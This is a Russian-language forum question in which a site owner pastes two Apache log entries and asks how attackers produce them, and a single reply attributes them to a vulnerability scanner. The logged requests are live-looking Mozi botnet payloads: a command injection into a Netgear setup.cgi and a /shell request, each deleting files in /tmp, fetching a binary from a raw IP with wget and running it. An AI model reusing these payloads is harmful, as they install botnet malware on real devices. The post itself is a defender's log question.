@GogenZZo

Как оставить след в логах апача?

Здравствуйте. Смотрю логи апача, кто-то пытается залить файл, и у них к сожалению это получилось. Есть такие записи
"GET /shell?cd+/tmp;rm+-rf+*;wget+117.221.178.19:40872/Mozi.a;chmod+777+Mozi.a;/tmp/... HTTP/1.0" 404 1723 "-" "Hello, world"
"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+178.175.88.132:39452/Mozi.m+-O+/tmp/netgear;sh+net... HTTP/1.0" 500 1711 "-" "-"

Как я не пытался, через домен, или по ip адресу, обратиться так же, но браузер просто говорит 404. Так же пробовал через telnet напрямую сделать запрос. И в логах ничего нет. Каким образом они делают такой запрос, что апач пишет это в лог?
  • Вопрос задан
  • 39 просмотров
Пригласить эксперта
Ответы на вопрос 1
firedragon
@firedragon
Senior .NET developer
Кто то сканирует ваш веб сервер, веб сервер говорит что нет такого файла, а во второй раз выдаёт ошибку. А такой результат можно получить запустив любой сканер уязвимостей на своём адресе
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы